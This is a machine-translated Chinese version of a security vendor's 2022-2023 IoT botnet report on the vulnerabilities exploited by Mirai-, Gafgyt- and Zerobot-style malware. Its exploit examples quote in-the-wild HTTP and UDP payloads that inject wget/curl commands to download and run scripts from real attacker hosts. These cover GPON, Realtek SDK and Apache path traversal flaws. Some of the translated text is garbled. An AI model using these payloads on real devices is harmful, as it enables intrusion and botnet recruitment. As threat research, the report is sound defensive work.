2022-2023年物联网僵尸网络报告

针对的脆弱性 Introduction 本报告调查了我们从2022年7月初到2023年1月底在受CUJOAI保护的消费者网络中观察到的物联网僵尸网络活动。有关我们研究的更多见解，请访问CUJOAI博客和ISP安全中心。 大多数物联网（IoT）设备的资源有限，类似Unix的操作系统和网络安全措施不足。后者，再加上设备制造商通常短暂而被忽视的软件支持周期，为热衷于利用这种情况的网络犯罪分子提供了重要的温床。 2022-2023年IoT僵尸网络报告-目标漏洞 目录目录 Introduction2loT威胁4僵尸网络?5工作5报告52022-2023年IoT僵尸网络报告：Summary6漏洞7CWE14注射14Targeted192022/202320漏洞23利用25 IoT威胁 我们最新的年度网络安全报告显示，虽然IP摄像机仅占CUJOAI监控和保护的所有设备的1.2％，但它们是所有恶意活动的24％。 物联网（IoT）由数十亿连接到互联网的设备组成，各种预测表明，它们的数量只会在未来几年增长。物联网设备有许多不同的形式：智能家用电器，打印机，IP摄像机，路由器，各种传感器，列表还在继续。从更技术的角度来看,具有IP地址的任何设备(其不像典型的台式计算机、膝上型计算机或智能电话那样被管理)可以被视为IoT设备。 什么叫僵尸网络？ 由于我们将讨论与僵尸网络相关的威胁，因此我们应该从僵尸网络的定义开始。僵尸网络是由特定恶意软件感染的设备组成的网络，其中设备可以由恶意软件的操作员控制。这种特定类型的恶意软件也被称为“僵尸网络”，这是我们从现在开始使用的含义。 僵尸网络如何工作 在过去的几年中，典型的僵尸网络相关的物联网设备攻击的解剖结构没有太大变化，我们在上一篇文章中对此进行了详细说明。简而言之，它涉及stagershell脚本，该脚本下载并开始执行恶意软件二进制文件。二进制名称通常包括它们被编译的CPU架构。在物联网环境中观察到的大多数恶意软件都是臭名昭著的Mirai或Gafgyt僵尸网络的变体，但以Go编写的恶意软件也在增加，Sysrv和Zerobot就是这方面的主要例子。 僵尸网络传播的两个主要载体是： 利用已知的软件漏洞一般来说，第一种是更常见的方法，正如我们在之前的报告中指出的那样：“质量差的物联网设备通常带有硬1.2. 编码的默认密码，用户不会更改这些密码，或者在强制更改密码时更改为易于记住（因此可以快速执行）的密码。 以前的僵尸网络报告 我们之前的报告涵盖了2021年的4个月，发现只有8%的样本包含漏洞利用。其中，83%使用了两个或更多漏洞利用。总共，我们发现了20个不同的漏洞作为目标，其中大多数是在2018年或更早的时候披露的。 2022-2023年物联网僵尸网络报告：摘要 在2022年7月初至2023年1月底之间，有6, 471个不同的ELF二进制文件被归类为恶意漏洞，1, 685个（26％）包含至少1个漏洞利用，比2021年的8％大幅增加。总共有55个漏洞被利用，是2021年的两倍多。 通过查看公共弱点枚举（CWE），这是一个由社区开发的分配给漏洞的硬件和软件漏洞类型列表，我们观察到了我们之前看到的100%“注入”型漏洞的一些变化。但是，即使CWE类别在技术上有所不同，恶意软件的目标也几乎总是相同的：在目标系统上远程运行命令。一个真正的离群值是CVE-2021-4034，它可以实现本地权限升级。 在最容易被利用的十大漏洞中，有三个新条目。但是，CVE - 2017 - 17215是迄今为止最常见的恶意软件漏洞：在1,685个包含漏洞的二进制文件中，有1, 625个使用了它。在更常见的新被利用的漏洞中，所有漏洞都与Zerobot僵尸网络有关，但其中两个也被其他恶意软件利用。 与我们上一份报告相比，漏洞在披露年份的分布显示出一些重大变化，因为最近（在本报告前两年内披露）的漏洞数量要大得多，尽管很少有恶意软件二进制文件利用它们。 使用两个或更多漏洞的恶意软件二进制文件减少- 2022 - 23年为40％，2021年为83％。总共观察到36个不同的漏洞集，Zerobot为最大的漏洞集配备了22个条目。 在我们的研究中发现的36个漏洞集中，只有6个包括最近披露的漏洞（在本报告之前的两年内）。其中四个集合由针对最近漏洞的大约50％或更多的漏洞利用组成。我们已经明确命名并列出了这四套以及它们的恶意软件，因为它们在利用新漏洞方面最具创新性。 被利用的漏洞列表 这是我们在2022年7月初至2023年1月底之间检测到的所有已利用漏洞的列表。“漏洞类型”列基于常见弱点枚举(CWE)。我们还列出了受影响的设备或软件类型以及特定型号或版本名称。 CWE漏洞类型分布 以下是基于CWE列表分发漏洞类型的方式： 大多数漏洞都映射到OWASP的十大Web应用程序安全风险列表中的注入类别，其中“注入”包括命令注入，不正确的输入验证和表达式语言注入。 利用这种类型的漏洞通常非常简单，因为它只需要一个或几个特制和参数化的HTTP请求，这些请求已经包含要在目标系统上执行的命令。这些命令-“利用代码”-通常下载并执行stager脚本或恶意二进制文件本身。我们观察到的大多数漏洞的攻击复杂度较低的另一个因素是，即使是未经身份验证的用户也可以执行完全有效的利用漏洞。 有9个漏洞在注入类别之外有CWE，如越界读/写或路径遍历。这些将在下面更详细地描述，但是，无论它们的CWE在技术上是什么，威胁行动者都可以通过利用其中的8个实现命令注入。 CVE-2018-10561和10562总是一起使用。第一个具有不正确的身份验证CWE，它指出可以通过将“？images”附加到需要在某些DasaGPON路由器上进行身份验证的任何URL来绕过身份验证。CVE-2018-10562表示，带有dest_host表单参数的diag_Form页面可以在系统上运行任意命令。于是，下面的漏洞就诞生了。 CVE - 2018 - 10561 / 10562的漏洞利用来自[2] POST /GponForm/ diag _Form? images/ HTTP/1.1主机:127.0. 0.1: 8080连接:保持活动Accept- Encoding: gzip, deflateAccept: */ *用户代理：你好，世界内容长度：118 XWebPageName =diag&diag _ action=ping&wan_ conlist=0&dest_host=";busy box +wget + http: / / 194.87.71.134/ ohshit.sh+-O+/ tmp /gpon8080;sh + / tmp/ gpon8080& ipv=0 CVE-2021-4034是一个真正的异常值，因为它可以实现本地权限升级，i。Procedres.，它允许攻击者在已经感染的系统上以root身份运行命令，并且本质上也是内存损坏漏洞。易受攻击的软件是polit的pexec实用程序，默认情况下可以在每个主要的Lix发行版上找到该实用程序。它涉及在pexec的环境中重新引入“不安全”的环境变量，例如“GCONV_PATH”。这些变量使攻击者能够以root身份运行任意命令，这些命令首先被编译为共享库文件。以下屏幕截图显示了GCON-V_PATH和mai的用法。write_gcov_modle()，负责共享库文件。您可以在此处找到有关该漏洞的更多详细信息。 CVE-2021-4034漏洞的指标取自[9] CVE-2021-35394和35395描述了Realte丛林SDK中的漏洞，这是多个路由器制造商使用的特定RealteSoC（片上系统）提供的一组二进制文件。CVE-2021-35394的漏洞利用与其他针对命令注入漏洞的漏洞利用略有不同，因为它不使用HTTP请求，而是使用专门形成的UDP数据包发送到LANIP地址上的路由器端口9034。 orf; cd /tmp;rm - rf mpsl; cd /tmp;/ bin /busybox wget http://89.203.251.188 /mipsel & chmod+ x mipsel&./ mipsel 另一方面，CVE-2021-35395使用发送到/goform/formWsc的正常HTTP请求，其中表单数据的peerPi参数包含利用命令。此漏洞也可以被另一个名为“formSysCmd”的页面及其表单数据参数sysCmd利用。'goform'部分对应于Go-Ahead网络服务器，用作路由器管理Web界面的基础。还有基于BoaWeb服务器的实现，它将在页面路径中转换为“boafrm”。 CVE-2021-35395的漏洞利用来自[5] POST /gofform/ formWsc用户代理：Mozilla / 5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML，如Gecko)Chrome /107.0. 0.0 Safari /537.36内容类型：application/x-www-form -urlencoded接受：* /*连接：关闭 submit- url =%2Fwlwps.asp & resetUnCfg= 0& peerPin=12345678;wgethttp:// zero.sudolite.ml / zero.sh ||curl-o http://zero.sudolite.ml /zero. sh|| | curl- O http:/ /zero.sudolite.ml~/.bash _history; chmod 755 zero.sh;/ bin /bash zero.sh;&setPIN=开始+PIN&configVxd = off &resetRptUnCfg =0 &peerRptPin= 至少还有另外两个CVE（CVE-2018-20057和CVE-2019-19824）可以追溯到CVE-2021-35395，因为它们描述了相同网页和表单参数的产品特定漏洞，尽管核心问题在于RealtekJungleSDK，该SDK用于具有这些漏洞的产品。Onegey的博客文章中对此进行了详细描述。 CVE-2021-41773和CVE-2021-42013属于路径遍历CWE。两者都会影响ApacheHTTPWeb服务器，并且CVE-2021-42013存在，因为CVE-2021-41773的修复程序不完整。来自Zerobot恶意软件（[5]）的示例以相同的方式操作：开始bash并执行表单数据部分中的命令，其中红色标记的部分是必不可少的，并且在实际请求中进行base64编码。应该注意的是，在Zerobot二进制文件中，实现这些漏洞利用的相关Go方法称为CVE-2018-12613，这是Zerobot未利用的完全不同的漏洞。 CVE - 2021 - 41773和CVE - 2021 - 42013的漏洞来自[5] wget http:/ /zero.sudolite. ml /zero. sh|| curl-o http://zero.sudolite.ml /zero.sh || curl -O http://zero.sudolite.ml/zero.sh;killall i.i mozi. m i.Mozm mozi.a. i. a.Moza.Mo~/.bash _ history; chmod 755 zero. sh; /bin /bash zero.sh 对于CVE - 2021 - 41773 POST /cgi- bin/.% 2e /%2e% 2e /% 2e% 2e /% 2e%2e/%2e%2e/bin/bash对于CVE - 2021 - 42013POST /cgi- bin/.%% 32% 65 /.%% 32%65 /.%%32%